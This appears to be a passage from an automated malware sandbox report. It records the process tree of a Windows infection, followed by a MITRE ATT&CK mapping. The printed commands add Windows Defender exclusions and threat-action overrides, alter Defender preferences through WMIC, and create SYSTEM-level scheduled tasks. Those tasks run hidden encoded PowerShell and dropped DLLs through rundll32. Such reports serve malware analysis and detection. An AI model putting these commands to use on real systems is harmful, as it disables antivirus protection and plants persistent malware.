"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3964

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:3428

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:1888

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:3052

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:2636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:3464

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:3608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:4340

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:3972

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:3548

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:4588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2840

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3980

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4444

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:3216

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:1948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:3768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:4700

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:4768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:4204

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:2772

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:464

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BcCQMXwjU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BcCQMXwjU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ITFcQRBGgRUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ITFcQRBGgRUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SwHdQyPSnQdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SwHdQyPSnQdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mfOEuGwqkLFbC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mfOEuGwqkLFbC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UakFvFPMbXVAWgVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UakFvFPMbXVAWgVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QomKEDtaZauBMonw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QomKEDtaZauBMonw\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcCQMXwjU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4308

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcCQMXwjU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcCQMXwjU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2316

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ITFcQRBGgRUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3964

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ITFcQRBGgRUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3428

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SwHdQyPSnQdU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1888

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SwHdQyPSnQdU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3052

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mfOEuGwqkLFbC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mfOEuGwqkLFbC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3464

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3316

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4972

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UakFvFPMbXVAWgVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:2740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UakFvFPMbXVAWgVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:4736

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2840

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:392

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa /t REG_DWORD /d 0 /reg:32
3⤵
PID:3116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa /t REG_DWORD /d 0 /reg:64
3⤵
PID:3516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QomKEDtaZauBMonw /t REG_DWORD /d 0 /reg:32
3⤵
PID:2552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QomKEDtaZauBMonw /t REG_DWORD /d 0 /reg:64
3⤵
PID:3920

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gLAIdHpKA" /SC once /ST 17:58:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:2268

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gLAIdHpKA"
2⤵
PID:3992

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gLAIdHpKA"
2⤵
PID:1376

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MVZgvzYKAFemhQpXL" /SC once /ST 14:17:35 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QomKEDtaZauBMonw\fdsKOKogfpICasy\KRtjXHn.exe\" XP /qgsite_idNLu 525403 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2008

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:640

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "MVZgvzYKAFemhQpXL"
2⤵
PID:4560

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1036

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:2740

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3676

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4876

C:\Windows\Temp\QomKEDtaZauBMonw\fdsKOKogfpICasy\KRtjXHn.exe
C:\Windows\Temp\QomKEDtaZauBMonw\fdsKOKogfpICasy\KRtjXHn.exe XP /qgsite_idNLu 525403 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4808

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bXvtwaJkKQEzfXjvnG"
2⤵
PID:1076

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
2⤵
PID:1664

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
3⤵
PID:1880

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
4⤵
PID:4768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1760

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
PID:2492

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BcCQMXwjU\YmSHPF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fjXiyaIJtNnEyln" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2944

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "fjXiyaIJtNnEyln2" /F /xml "C:\Program Files (x86)\BcCQMXwjU\ofYmWRY.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1888

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2740

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "fjXiyaIJtNnEyln"
2⤵
PID:4460

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "fjXiyaIJtNnEyln"
2⤵
PID:1600

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "IqaVnllQPEviET" /F /xml "C:\Program Files (x86)\SwHdQyPSnQdU2\IXDlPKV.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2820

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1076

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "JGPIZArYwJUkk2" /F /xml "C:\ProgramData\UakFvFPMbXVAWgVB\gEhelVJ.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1604

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4340

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZsHeBHvvmLjUCPViS2" /F /xml "C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\fhVzBeL.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3924

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MjkxzwBObpHYXaFcLDg2" /F /xml "C:\Program Files (x86)\mfOEuGwqkLFbC\Pnhdyer.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4468

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "xxPoWeVRQBzFwCLPV" /SC once /ST 15:32:57 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QomKEDtaZauBMonw\AFiLmQlV\gswNwBJ.dll\",#1 /DUsite_idjSA 525403" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4380

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "xxPoWeVRQBzFwCLPV"
2⤵
PID:3236

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MVZgvzYKAFemhQpXL"
2⤵
PID:3332

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QomKEDtaZauBMonw\AFiLmQlV\gswNwBJ.dll",#1 /DUsite_idjSA 525403
1⤵
PID:4444

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QomKEDtaZauBMonw\AFiLmQlV\gswNwBJ.dll",#1 /DUsite_idjSA 525403
2⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:4868

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "xxPoWeVRQBzFwCLPV"
3⤵
PID:4144

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3464

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:396

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

Defense Evasion

Modify Registry

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery